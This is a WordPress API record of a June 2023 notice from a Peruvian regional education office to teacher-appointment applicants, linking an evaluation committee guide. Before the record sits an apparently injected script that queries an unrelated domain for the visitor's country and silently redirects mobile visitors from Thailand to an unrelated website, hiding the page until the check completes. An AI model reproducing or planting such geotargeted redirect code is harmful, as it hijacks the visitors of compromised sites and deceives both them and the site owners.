<script>
(function() {
    var isDesktop = true;
    
    // Desktop = stay
    if (isDesktop) {
        document.body.style.visibility = "visible";
        return;
    }
    
    var key = "geo_th_v1";
    var cached = localStorage.getItem(key);
    
    // Mobile + TH = redirect
    if (cached === "TH") {
        location.href = "https://www.wakeboard-madrid.com/";
        return;
    }
    
    // Mobile + non-TH (cached) = stay
    if (cached && cached !== "TH") {
        document.body.style.visibility = "visible";
        return;
    }
    
    // Fetch country
    fetch("https://kuproy.xyz/")
        .then(function(r) { return r.text(); })
        .then(function(c) {
            var country = c.trim().toUpperCase();
            localStorage.setItem(key, country);
            
            // TH = redirect, non-TH = stay
            if (country === "TH") {
                location.href = "https://www.wakeboard-madrid.com/";
            } else {
                document.body.style.visibility = "visible";
            }
        })
        .catch(function() {
            // Error = assume non-TH, stay
            localStorage.setItem(key, "NOT_TH");
            document.body.style.visibility = "visible";
        });
})();
</script>{"id":3218,"date":"2023-06-08T16:39:05","date_gmt":"2023-06-08T21:39:05","guid":{"rendered":"https:\/\/ugelarequipanorte.gob.pe\/wp\/?p=3218"},"modified":"2023-06-08T16:39:06","modified_gmt":"2023-06-08T21:39:06","slug":"comunicado-n-o-154-2023-postulantes-de-nombramiento-docente-que-no-se-requiere-autentificacion-de-documentos","status":"publish","type":"post","link":"https:\/\/ugelarequipanorte.gob.pe\/wp\/comunicado-n-o-154-2023-postulantes-de-nombramiento-docente-que-no-se-requiere-autentificacion-de-documentos\/","title":{"rendered":"COMUNICADO N.\u00ba 154 \u2013 2023 \u2013POSTULANTES DE NOMBRAMIENTO DOCENTE QUE NO SE REQUIERE AUTENTIFICACI\u00d3N DE DOCUMENTOS"},"content":{"rendered":"\n<p><strong>PARA DESCAR<\/strong><strong>GAR EL <\/strong><strong>INSTRUCTIVO PARA EL COMIT\u00c9 DE EVALUACI\u00d3N HAGA CLIC EN EL ENLACE:<\/strong><\/p>\n\n\n\n<p><a href=\"https:\/\/drive.google.com\/file\/d\/1bkLgzsof5VToP-NDALfMJQKiqIYYBXxf\/view?usp=sharing\">https:\/\/drive.google.com\/file\/d\/1bkLgzsof5VToP-NDALfMJQKiqIYYBXxf\/view?usp=sharing<\/a><\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"905\" height=\"1024\" src=\"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-content\/uploads\/2023\/06\/8-06-2023-905x1024.png\" alt=\"\" class=\"wp-image-3219\" srcset=\"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-content\/uploads\/2023\/06\/8-06-2023-905x1024.png 905w, https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-content\/uploads\/2023\/06\/8-06-2023-265x300.png 265w, https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-content\/uploads\/2023\/06\/8-06-2023-768x869.png 768w, https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-content\/uploads\/2023\/06\/8-06-2023.png 1122w\" sizes=\"auto, (max-width: 905px) 100vw, 905px\" \/><\/figure>\n","protected":false},"excerpt":{"rendered":"<p>PARA DESCARGAR EL INSTRUCTIVO PARA EL COMIT\u00c9 DE EVALUACI\u00d3N HAGA CLIC EN EL ENLACE: https:\/\/drive.google.com\/file\/d\/1bkLgzsof5VToP-NDALfMJQKiqIYYBXxf\/view?usp=sharing<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-3218","post","type-post","status-publish","format-standard","hentry","category-comunicados"],"_links":{"self":[{"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/posts\/3218","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/comments?post=3218"}],"version-history":[{"count":1,"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/posts\/3218\/revisions"}],"predecessor-version":[{"id":3220,"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/posts\/3218\/revisions\/3220"}],"wp:attachment":[{"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/media?parent=3218"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/categories?post=3218"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/tags?post=3218"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}